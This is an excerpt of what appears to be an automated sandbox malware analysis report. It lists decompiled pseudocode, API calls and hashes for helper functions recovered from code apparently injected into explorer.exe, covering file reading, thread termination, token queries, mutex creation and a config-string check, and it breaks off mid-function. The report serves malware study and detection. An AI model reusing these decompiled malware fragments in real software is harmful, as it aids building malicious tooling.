Opcode Fuzzy Hash: 81f3699c94ef1a9ea46a63be672b8f442af5477ad025c1fa7ed7b4e588c3df8b
Instruction Fuzzy Hash: 7D414BB6A012069FDB36DF5CEC84C2677B9FB88314B564A1DE8668F389D731E804DB50

Uniqueness

Uniqueness Score: 0.00%

Function 01519030, Relevance: 4.6, APIs: 3, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01519030(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				void* _v12;
				char _v16;
				DWORD* _v20;
				void* _t30;
				DWORD* _t32;
				void* _t35;
				void* _t55;
				void* _t56;
				void* _t57;

				_v12 = 0;
				_v20 = 0;
				_t30 = E01518E10(__ecx, _a4); // executed
				_t56 = _t55 + 4;
				_v12 = _t30;
				if(_v12 != 0) {
					_t44 = _v12;
					_v8 = GetFileSize(_v12, 0);
					if(_v8 != 0) {
						_t32 = E01513960(_t44, _v8 + 1);
						_t57 = _t56 + 4;
						_v20 = _t32;
						if(_v20 != 0) {
							_t35 = E01518ED0(_v12, _v20, _v8,  &_v16); // executed
							_t57 = _t57 + 0x10;
							if(_t35 != 0) {
								if(_v16 == _v8) {
									 *((char*)(_v20 + _v8)) = 0;
									if(_a8 != 0) {
										 *_a8 = _v8;
									}
									CloseHandle(_v12); // executed
									return _v20;
								}
								L13:
								if(_v12 != 0) {
									CloseHandle(_v12);
								}
								if(_v20 != 0) {
									E01513990( &_v20, 0);
								}
								return 0;
							}
							goto L13;
						}
						goto L13;
					}
					goto L13;
				}
				goto L13;
			}

0x01519036
0x0151903d
0x01519048
0x0151904d
0x01519050
0x01519057
0x0151905d
0x01519067
0x0151906e
0x01519079
0x0151907e
0x01519081
0x01519088
0x0151909c
0x015190a1
0x015190a6
0x015190b0
0x015190ba
0x015190c1
0x015190c9
0x015190c9
0x015190cf
0x00000000
0x015190d5
0x015190da
0x015190de
0x015190e4
0x015190e4
0x015190ee
0x015190f6
0x015190fb
0x00000000
0x015190fe
0x00000000
0x015190a8
0x00000000
0x0151908a
0x00000000
0x01519070
0x00000000

APIs

Part of subcall function 01518E10: CreateFileW.KERNEL32(0151904D,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0151904D), ref: 01518E2E

GetFileSize.KERNEL32(00000000,00000000), ref: 01519061
CloseHandle.KERNEL32(00000000), ref: 015190E4

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 74791a6bd4340f2de447e75be1f7aac704f10ecc830bcbbdfebe9432e04b1cda
Instruction ID: 244aa699d069fcc144efd4531d5668e97329660f751b79182221d36d523def0c
Opcode Fuzzy Hash: 74791a6bd4340f2de447e75be1f7aac704f10ecc830bcbbdfebe9432e04b1cda
Instruction Fuzzy Hash: CC317479D00109EFEF12DF98C8A4BAEB7B5FF44308F108958E516AB248D775AB84CB41

Uniqueness

Uniqueness Score: 8.94%

Function 01502ECB, Relevance: 4.6, APIs: 3, Instructions: 76
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E01502ECB(void* __edx, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16) {
				long _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __esi;
				void** _t33;
				long _t34;
				int _t36;
				void* _t43;
				void* _t44;
				void* _t50;
				void** _t51;
				void* _t54;

				_t54 = __eflags;
				_v8 = 0xffffffe1;
				E01514080( &_v24);
				E01514080( &_v16);
				_v40 = _a8;
				_v36 = _a12;
				_v32 = _a16;
				_v28 =  &_v16;
				_t33 = E01506FC0(_t50, _t54, _a4,  &_v40, 0x10, 1); // executed
				_t51 = _t33;
				if(_t51 != 0) {
					while(1) {
						_t34 = WaitForSingleObject( *_t51, 0x3e8);
						__eflags = _t34;
						if(_t34 == 0) {
							break;
						}
						__eflags = _t34 - 0xffffffff;
						if(_t34 == 0xffffffff) {
							_v8 = 0xffffffde;
							L11:
							__eflags = _v8 - 0xffffffe1;
							if(_v8 == 0xffffffe1) {
								TerminateThread( *_t51, 0);
							}
							E01506F12(_t44, _t51, _t51, 1);
							return _v8;
						}
						E01514080( &_v24);
						_t44 = _v16 + 0xf0;
						asm("adc eax, 0x0");
						__eflags = _v20 - _v12;
						if(__eflags > 0) {
							goto L11;
						}
						if(__eflags < 0) {
							continue;
						}
						__eflags = _v24 - _t44;
						if(_v24 >= _t44) {
							goto L11;
						}
					}
					_t36 = GetExitCodeThread( *_t51,  &_v8);
					__eflags = _t36;
					if(_t36 == 0) {
						_v8 = 0xffffffdf;
					}
					goto L11;
				}
				_t43 = 0xffffffe0;
				return _t43;
			}

0x01502ecb
0x01502ed6
0x01502edd
0x01502ee6
0x01502eee
0x01502ef4
0x01502efa
0x01502f02
0x01502f0e
0x01502f13
0x01502f1a
0x01502f21
0x01502f28
0x01502f2e
0x01502f30
0x00000000
0x00000000
0x01502f32
0x01502f35
0x01502f77
0x01502f7e
0x01502f7e
0x01502f82
0x01502f88
0x01502f88
0x01502f91
0x00000000
0x01502f9a
0x01502f3b
0x01502f47
0x01502f4d
0x01502f50
0x01502f53
0x00000000
0x00000000
0x01502f55
0x00000000
0x00000000
0x01502f57
0x01502f5a
0x00000000
0x00000000
0x01502f5c
0x01502f64
0x01502f6a
0x01502f6c
0x01502f6e
0x01502f6e
0x00000000
0x01502f6c
0x01502f1e
0x00000000

APIs

Part of subcall function 01514080: GetSystemTimeAsFileTime.KERNEL32(0150639D,?,?,015077B6,015379D0,0150639D), ref: 0151408A
Part of subcall function 01514080: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015140B6

WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 01502F28
GetExitCodeThread.KERNEL32(00000000,FFFFFFE1), ref: 01502F64
TerminateThread.KERNEL32(00000000,00000000), ref: 01502F88

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: ThreadTime$CodeExitFileObjectSingleSystemTerminateUnothrow_t@std@@@Wait__ehfuncinfo$??2@
String ID:
API String ID: 3365371684-0
Opcode ID: 518fdbce86c80313a47ce450464e3a75aaa9a0823284ca53b4d409dcd4993a75
Instruction ID: 208d0f2af8c1aafc920c6d1298828a7a505317d794ad87457a418af9920c1b31
Opcode Fuzzy Hash: 518fdbce86c80313a47ce450464e3a75aaa9a0823284ca53b4d409dcd4993a75
Instruction Fuzzy Hash: E0218271C0020AEBDF22DFE8C945ADE77B8FB043A0F10066AE565EB1D0E7319A04DB91

Uniqueness

Uniqueness Score: 10.55%

Function 003F86D0, Relevance: 4.6, APIs: 3, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E003F86D0(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				void* _v12;
				char _v16;
				DWORD* _v20;
				void* _t30;
				DWORD* _t32;
				void* _t35;
				void* _t55;
				void* _t56;
				void* _t57;

				_v12 = 0;
				_v20 = 0;
				_t30 = E003F85A0(__ecx, _a4); // executed
				_t56 = _t55 + 4;
				_v12 = _t30;
				if(_v12 != 0) {
					_t44 = _v12;
					_v8 = GetFileSize(_v12, 0);
					if(_v8 != 0) {
						_t32 = E003F3EE0(_t44, _v8 + 1);
						_t57 = _t56 + 4;
						_v20 = _t32;
						if(_v20 != 0) {
							_t35 = E003F8660(_v12, _v20, _v8,  &_v16); // executed
							_t57 = _t57 + 0x10;
							if(_t35 != 0) {
								if(_v16 == _v8) {
									 *((char*)(_v20 + _v8)) = 0;
									if(_a8 != 0) {
										 *_a8 = _v8;
									}
									CloseHandle(_v12); // executed
									return _v20;
								}
								L13:
								if(_v12 != 0) {
									CloseHandle(_v12);
								}
								if(_v20 != 0) {
									E003F3F10( &_v20, 0);
								}
								return 0;
							}
							goto L13;
						}
						goto L13;
					}
					goto L13;
				}
				goto L13;
			}

0x003f86d6
0x003f86dd
0x003f86e8
0x003f86ed
0x003f86f0
0x003f86f7
0x003f86fd
0x003f8707
0x003f870e
0x003f8719
0x003f871e
0x003f8721
0x003f8728
0x003f873c
0x003f8741
0x003f8746
0x003f8750
0x003f875a
0x003f8761
0x003f8769
0x003f8769
0x003f876f
0x00000000
0x003f8775
0x003f877a
0x003f877e
0x003f8784
0x003f8784
0x003f878e
0x003f8796
0x003f879b
0x00000000
0x003f879e
0x00000000
0x003f8748
0x00000000
0x003f872a
0x00000000
0x003f8710
0x00000000

APIs

GetFileSize.KERNEL32(?,00000000), ref: 003F8701
CloseHandle.KERNEL32(?), ref: 003F8784

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseFileHandleSize
String ID:
API String ID: 3849164406-0
Opcode ID: d6c9dcabc47b89111805e03b3b8f2e6d66f1331515adf75b9d487984e4064ac9
Instruction ID: c802c75236b2ce2a51d6d5b62c3ff4e9f0adf351b1caf0abe9d9adf40942dfd5
Opcode Fuzzy Hash: d6c9dcabc47b89111805e03b3b8f2e6d66f1331515adf75b9d487984e4064ac9
Instruction Fuzzy Hash: D6312BB5D0020CEBDF09EFA4C985BBEB7B8FB04305F248558E615A7240DB749A48DB91

Uniqueness

Uniqueness Score: 8.94%

Function 0151D6A0, Relevance: 4.6, APIs: 3, Instructions: 64
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 46%

			E0151D6A0(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, DWORD* _a12) {
				void* _v8;
				long _v12;
				int _t17;
				int _t24;

				_v8 = 0;
				_t29 = _a8;
				_t17 = GetTokenInformation(_a4, _a8, 0, 0,  &_v12); // executed
				if(_t17 != 0 || GetLastError() != 0x7a) {
					while(0 != 0) {
					}
					goto L13;
				} else {
					_v8 = E01513960(_t29, _v12);
					if(_v8 != 0) {
						_t24 = GetTokenInformation(_a4, _a8, _v8, _v12, _a12); // executed
						if(_t24 != 0) {
							L13:
							return _v8;
						}
						while(0 != 0) {
						}
						if(_v8 != 0) {
							E01513990( &_v8, 0);
						}
						return 0;
					}
					while(0 != 0) {
					}
					return 0;
				}
			}

0x0151d6a6
0x0151d6b5
0x0151d6bd
0x0151d6c5
0x0151d719
0x0151d71d
0x00000000
0x0151d6d2
0x0151d6de
0x0151d6e5
0x0151d705
0x0151d70d
0x0151d71f
0x00000000
0x0151d71f
0x0151d70f
0x0151d713
0x0151d728
0x0151d730
0x0151d735
0x00000000
0x0151d738
0x0151d6e7
0x0151d6eb
0x00000000
0x0151d6ed

APIs

GetTokenInformation.ADVAPI32(00000001,00000001(TokenIntegrityLevel),00000000,00000000,00000001,00000001), ref: 0151D6BD
GetLastError.KERNEL32 ref: 0151D6C7

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

GetTokenInformation.ADVAPI32(?,?,00000000,?,?), ref: 0151D705

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocErrorHeapLast
String ID:
API String ID: 4258577378-0
Opcode ID: b8f599faa15447e9e30b51c2b0eae8f2d13510d3fa71585a02d413791a6b2efd
Instruction ID: 32761d467a3bed0580698c87b6099b48fb6b7ac9a2c9ad468cb9cdc54c5fd609
Opcode Fuzzy Hash: b8f599faa15447e9e30b51c2b0eae8f2d13510d3fa71585a02d413791a6b2efd
Instruction Fuzzy Hash: B011C476A00148FBFF26DEE8D94CFAE77F8BB04204F104915E60ADF148E7389A049751

Uniqueness

Uniqueness Score: 0.15%

Function 003F72A0, Relevance: 4.6, APIs: 3, Instructions: 64
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 46%

			E003F72A0(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, DWORD* _a12) {
				void* _v8;
				long _v12;
				int _t17;
				int _t24;

				_v8 = 0;
				_t29 = _a8;
				_t17 = GetTokenInformation(_a4, _a8, 0, 0,  &_v12); // executed
				if(_t17 != 0 || GetLastError() != 0x7a) {
					while(0 != 0) {
					}
					goto L13;
				} else {
					_v8 = E003F3EE0(_t29, _v12);
					if(_v8 != 0) {
						_t24 = GetTokenInformation(_a4, _a8, _v8, _v12, _a12); // executed
						if(_t24 != 0) {
							L13:
							return _v8;
						}
						while(0 != 0) {
						}
						if(_v8 != 0) {
							E003F3F10( &_v8, 0);
						}
						return 0;
					}
					while(0 != 0) {
					}
					return 0;
				}
			}

0x003f72a6
0x003f72b5
0x003f72bd
0x003f72c5
0x003f7319
0x003f731d
0x00000000
0x003f72d2
0x003f72de
0x003f72e5
0x003f7305
0x003f730d
0x003f731f
0x00000000
0x003f731f
0x003f730f
0x003f7313
0x003f7328
0x003f7330
0x003f7335
0x00000000
0x003f7338
0x003f72e7
0x003f72eb
0x00000000
0x003f72ed

APIs

GetTokenInformation.ADVAPI32(00000001,00000001(TokenIntegrityLevel),00000000,00000000,00000001,00000001), ref: 003F72BD
GetLastError.KERNEL32 ref: 003F72C7

Part of subcall function 003F3EE0: HeapAlloc.KERNEL32(015A0000,00000008,00405340,?,?,003F3F90,003F7DD5,?,?,003F7DD6,00405340,00000839), ref: 003F3EF1

GetTokenInformation.ADVAPI32(?,?,00000000,?,?), ref: 003F7305

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocErrorHeapLast
String ID:
API String ID: 4258577378-0
Opcode ID: 888e4989ac05d7085568fceae965cf2af792cb8377f1fed35c964a26dd9bd866
Instruction ID: 36d855c8a3375f6ae8140537894599e89476c0a02136f2331fa521321a9b5da1
Opcode Fuzzy Hash: 888e4989ac05d7085568fceae965cf2af792cb8377f1fed35c964a26dd9bd866
Instruction Fuzzy Hash: 1E119379A0810DFBDB11DBA4D845BBE73BCAB48304F204866FB05D7540E7709E00ABE1

Uniqueness

Uniqueness Score: 0.15%

Function 0151D770, Relevance: 4.6, APIs: 3, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E0151D770(void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				char _t19;

				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				if(OpenProcessToken(_a4, 8,  &_v16) != 0) {
					_t19 = E0151D740(_v16); // executed
					_v20 = _t19;
					if(_v20 != 0) {
						CloseHandle(_v16); // executed
						return _v20;
					}
					while(0 != 0) {
					}
					if(_v20 != 0) {
						E01513990( &_v20, 0);
					}
					if(_v16 != 0) {
						CloseHandle(_v16);
					}
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x0151d776
0x0151d77d
0x0151d784
0x0151d78b
0x0151d7a4
0x0151d7b4
0x0151d7bc
0x0151d7c3
0x0151d7d1
0x00000000
0x0151d7d7
0x0151d7c5
0x0151d7c9
0x0151d7e0
0x0151d7e8
0x0151d7ed
0x0151d7f4
0x0151d7fa
0x0151d7fa
0x00000000
0x0151d800
0x0151d7a6
0x0151d7aa
0x00000000

APIs

OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 0151D79C
CloseHandle.KERNEL32(00000000), ref: 0151D7D1
CloseHandle.KERNEL32(00000000), ref: 0151D7FA

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle$OpenProcessToken
String ID:
API String ID: 2202715855-0
Opcode ID: 66956be0716ec5fe6b50726818d3573d5d84caef2c72eb4f0899bba8623b4030
Instruction ID: 647bfee336d472d0d3374b8605c53c905111d9b0ce8cbbd1158318ef052d26d7
Opcode Fuzzy Hash: 66956be0716ec5fe6b50726818d3573d5d84caef2c72eb4f0899bba8623b4030
Instruction Fuzzy Hash: 9B115275D0021AEBFB12DFE4C84DBBEB7B4BB44304F048959D5269F288E7799604CB91

Uniqueness

Uniqueness Score: 4.01%

Function 003F74B0, Relevance: 4.6, APIs: 3, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E003F74B0(void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				char _t19;

				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				if(OpenProcessToken(_a4, 8,  &_v16) != 0) {
					_t19 = E003F7480(_v16); // executed
					_v20 = _t19;
					if(_v20 != 0) {
						CloseHandle(_v16); // executed
						return _v20;
					}
					while(0 != 0) {
					}
					if(_v20 != 0) {
						E003F3F10( &_v20, 0);
					}
					if(_v16 != 0) {
						CloseHandle(_v16);
					}
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x003f74b6
0x003f74bd
0x003f74c4
0x003f74cb
0x003f74e4
0x003f74f4
0x003f74fc
0x003f7503
0x003f7511
0x00000000
0x003f7517
0x003f7505
0x003f7509
0x003f7520
0x003f7528
0x003f752d
0x003f7534
0x003f753a
0x003f753a
0x00000000
0x003f7540
0x003f74e6
0x003f74ea
0x00000000

APIs

OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 003F74DC
CloseHandle.KERNEL32(00000000), ref: 003F7511
CloseHandle.KERNEL32(00000000), ref: 003F753A

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle$OpenProcessToken
String ID:
API String ID: 2202715855-0
Opcode ID: cd5832048dba75ed4f69cc3bc3d0565d17324580b5d4a978011c6edeca3ebf5a
Instruction ID: cb61b310efedaf6c3778379c29c892734b3abb2de33258bf7dd98182e642b8b1
Opcode Fuzzy Hash: cd5832048dba75ed4f69cc3bc3d0565d17324580b5d4a978011c6edeca3ebf5a
Instruction Fuzzy Hash: 2111A1B0E1820DEBDF12DFE1DC49BBF77B8BB04304F048869E61A96190D7759604CB91

Uniqueness

Uniqueness Score: 4.01%

Function 01502A8E, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 45
stringUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E01502A8E(intOrPtr __edx, CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
				int _t7;
				void* _t13;
				int _t14;
				void* _t15;
				intOrPtr _t16;
				intOrPtr _t17;
				void* _t23;

				_t16 = __edx;
				_t7 = lstrcmpA( *0x1537920, _a4);
				_t17 = _a12;
				if(_t7 != 0) {
					L3:
					E01513D60(_t15,  *0x1537920, _a4, 0x100);
					E01513D60(_t15,  *0x153793c, _a8, 8);
					 *0x1537938 = _t17;
					 *0x1537950 = E01514080(0);
					 *0x1537954 = _t16;
					E01515AF0(0x2d,  *0x1537920);
					E01515AF0(0x2e, _a8);
					_t13 = E01515C00(_t15, 0, "jkfkdm"); // executed
					return _t13;
				}
				_t14 = lstrcmpA( *0x153793c, _a8);
				if(_t14 != 0) {
					goto L3;
				}
				_t23 = _t17 -  *0x1537938; // 0x1
				if(_t23 != 0) {
					goto L3;
				}
				return _t14;
			}

0x01502a8e
0x01502aa2
0x01502aa4
0x01502aa9
0x01502ac2
0x01502ad0
0x01502ae0
0x01502ae7
0x01502af8
0x01502aff
0x01502b05
0x01502b0f
0x01502b1b
0x00000000
0x01502b20
0x01502ab4
0x01502ab8
0x00000000
0x00000000
0x01502aba
0x01502ac0
0x00000000
0x00000000
0x01502b26

APIs

lstrcmpA.KERNEL32(?), ref: 01502AA2
lstrcmpA.KERNEL32(?), ref: 01502AB4

Strings

jkfkdm, xrefs: 01502B14

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmp
String ID: jkfkdm
API String ID: 1534048567-2652042395
Opcode ID: f6b144f1c0ec9a23efe96896fb70f659f13f0edfe67f4159e7974111f7f5acce
Instruction ID: e0ed1b4abda8750d28b13eeb9214c009dfa6a8028f604578aa9f49731495a690
Opcode Fuzzy Hash: f6b144f1c0ec9a23efe96896fb70f659f13f0edfe67f4159e7974111f7f5acce
Instruction Fuzzy Hash: C40188B7A4120ABBEB236F94EC01F5C3B65FB9C710F064111FA245F2A8D7B15454BB90

Uniqueness

Uniqueness Score: 100.00%

Function 01518810, Relevance: 4.5, APIs: 3, Instructions: 42
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E01518810(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				void* _v8;
				void* _t11;

				_push(__ecx);
				_v8 = 0;
				_t11 = CreateMutexA(0, 1, _a4); // executed
				_v8 = _t11;
				if(_v8 != 0) {
					if(GetLastError() != 0xb7) {
						L11:
						return _v8;
					}
					while(0 != 0) {
					}
					if(E01518890(_v8, _v8, _a8) >= 0) {
						goto L11;
					}
					while(0 != 0) {
					}
					CloseHandle(_v8);
					_v8 = 0;
					goto L11;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x01518813
0x01518814
0x01518823
0x01518829
0x01518830
0x01518847
0x0151887a
0x00000000
0x0151887a
0x01518849
0x0151884d
0x01518861
0x00000000
0x00000000
0x01518863
0x01518867
0x0151886d
0x01518873
0x00000000
0x01518873
0x01518832
0x01518836
0x00000000

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,015053AB,?,015070A4,00000000,00000001,00080000,00000000,?,?,01505609,015053AB,00000000,00000000), ref: 01518823
GetLastError.KERNEL32(?,015070A4,00000000,00000001,00080000,00000000,?,?,01505609,015053AB,00000000,00000000,00000000), ref: 0151883C
CloseHandle.KERNEL32(00000000,00000000), ref: 0151886D

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CloseCreateErrorHandleLastMutex
String ID:
API String ID: 4294037311-0
Opcode ID: f16fb25f1439752959061e2d0ee77cf03c7cb9e9ac657ffdc0f986b8af442cba
Instruction ID: b597fb51b728f3d902ed5dbae0d40927b4bc1a3d891e5305104c5715642939a4
Opcode Fuzzy Hash: f16fb25f1439752959061e2d0ee77cf03c7cb9e9ac657ffdc0f986b8af442cba
Instruction Fuzzy Hash: D6016D75A05209FBFB32DAA9E944B6D7BB5BB44301F104C54ED06DF248D7718A049B51

Uniqueness

Uniqueness Score: 0.23%

Function 01516380, Relevance: 4.5, APIs: 3, Instructions: 37
UNIQUE

Download Yara Rule

C-Code - Quality: 16%

			E01516380(signed int _a4, char* _a8, int _a12) {
				signed int _v8;
				char** _v12;
				signed int _t12;

				_v12 = 0;
				_v8 = 0;
				_t12 = _a4;
				__imp__#11(_t12);
				_v8 = _t12;
				__imp__#51( &_v8, 4, 2); // executed
				_v12 = _t12;
				if(_v12 != 0) {
					if( *_v12 != 0) {
						strncpy(_a8,  *_v12, _a12);
						return 0;
					}
					return 0xfffffffe;
				}
				return _t12 | 0xffffffff;
			}

0x01516386
0x0151638d
0x01516394
0x01516398
0x0151639e
0x015163a9
0x015163af
0x015163b6
0x015163c3
0x015163da
0x00000000
0x015163e2
0x00000000
0x015163c5
0x00000000

APIs

#11.WS2_32(00000000), ref: 01516398
#51.WS2_32(00000000,00000004,00000002), ref: 015163A9

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a77e11b1764810e148be6a443b0a5246aeea7df6b7413c2c56f44ce868699192
Instruction ID: 0a1882337a606769e13fdf2d165b0bd084279bae557973be719304b19905547c
Opcode Fuzzy Hash: a77e11b1764810e148be6a443b0a5246aeea7df6b7413c2c56f44ce868699192
Instruction Fuzzy Hash: 56014471900208EFDB11DFA4C888B9D7BB4BB49314F204695F9159F2C4D775DA84CB91

Uniqueness

Uniqueness Score: 100.00%

Function 003F7050, Relevance: 4.5, APIs: 3, Instructions: 32
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E003F7050(void* __ecx, CHAR* _a4) {
				void* _v8;
				void* _t8;

				_v8 = 0;
				_t8 = CreateMutexA(0, 1, _a4); // executed
				_v8 = _t8;
				if(_v8 != 0) {
					if(GetLastError() != 0xb7) {
						return _v8;
					}
					while(0 != 0) {
					}
					CloseHandle(_v8);
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x003f7054
0x003f7063
0x003f7069
0x003f7070
0x003f7087
0x00000000
0x003f709d
0x003f7089
0x003f708d
0x003f7093
0x00000000
0x003f7099
0x003f7072
0x003f7076
0x00000000

APIs

CreateMutexA.KERNEL32(00000000,00000001,003F8BB5,00000000,?,003F8BB5), ref: 003F7063
GetLastError.KERNEL32(?,003F8BB5), ref: 003F707C
CloseHandle.KERNEL32(00000000,?,003F8BB5), ref: 003F7093

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseCreateErrorHandleLastMutex
String ID:
API String ID: 4294037311-0
Opcode ID: 131bf2d3371e7958d9429f0570d5ed090fa4fdb282b6caa74014d4be4ad205ce
Instruction ID: 7f94d61d4e2c1af0b3f78b518f6524f2cb6b7c2ab1df3b2d5dc63e5b3abca93d
Opcode Fuzzy Hash: 131bf2d3371e7958d9429f0570d5ed090fa4fdb282b6caa74014d4be4ad205ce
Instruction Fuzzy Hash: D0F08C70A1D20FEBDB11DBA4DA49BBE77B8EF08301F204464F606D6680DE715E009A66

Uniqueness

Uniqueness Score: 0.23%

Function 003F6FE0, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 32stringUNIQUE

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 003F7017
CharUpperBuffA.USER32(?,00000000), ref: 003F7025

Strings

%s%u, xrefs: 003F6FF7

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: BuffCharUpperlstrlen
String ID: %s%u
API String ID: 1627498458-679674701
Opcode ID: 5d90820745b6ad0dd68df908e51149b9b4140fb6ad8fcc108c84799a08de8433
Instruction ID: 97ee9364b9b9d0a710c64f570b17be71eed6a0f7753029ec0553480165922be3
Opcode Fuzzy Hash: 5d90820745b6ad0dd68df908e51149b9b4140fb6ad8fcc108c84799a08de8433
Instruction Fuzzy Hash: 4EF054B691420C67CB50DBA0EC46DFB373C9B54304F404595BA899A141EEB4D6948BA0

Uniqueness

Uniqueness Score: 100.00%

Function 01501D04, Relevance: 3.9, APIs: 3, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01501D04(void* __ecx, void* __edx, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v476;
				char _v492;
				char _v524;
				void* _t27;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t34;
				intOrPtr _t35;
				signed int _t41;
				signed int _t43;
				signed int _t46;
				int _t48;
				signed int _t49;
				signed int _t53;
				int _t55;
				signed int _t56;
				signed int _t60;
				int _t62;
				signed int _t63;
				signed int _t67;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				void* _t76;
				signed int _t83;
				signed int _t84;
				void* _t86;

				_t86 = __edx;
				_t27 = E01516480(__ecx); // executed
				if(_t27 <= 0) {
					_t29 =  *0x1537904; // 0x1909e28
					_t30 = E015162E0(_t29, __ecx,  *((intOrPtr*)(_t29 + 0x2660)),  &_v8);
					__eflags = _t30;
					if(_t30 >= 0) {
						__eflags =  *0x1537910; // 0x0
						if(__eflags != 0) {
							L9:
							_t31 = 0xfffffffd;
						} else {
							_t32 =  *0x1537904; // 0x1909e28
							_t34 = E015161E0( *(_t32 + 0x2668) & 0x0000ffff, _v8,  *(_t32 + 0x2668) & 0x0000ffff, 1, 0);
							_t83 =  *0x1537904; // 0x1909e28
							 *(_t83 + 4) = _t34;
							__eflags = _t34;
							if(_t34 >= 0) {
								__eflags =  *0x1537910; // 0x0
								if(__eflags != 0) {
									goto L9;
								} else {
									_t35 = E01501836(_t83, __fp0);
									_t84 =  *0x1537904; // 0x1909e28
									 *((intOrPtr*)(_t84 + 0x25d6)) = _t35;
									__eflags =  *0x1537910; // 0x0
									if(__eflags == 0) {
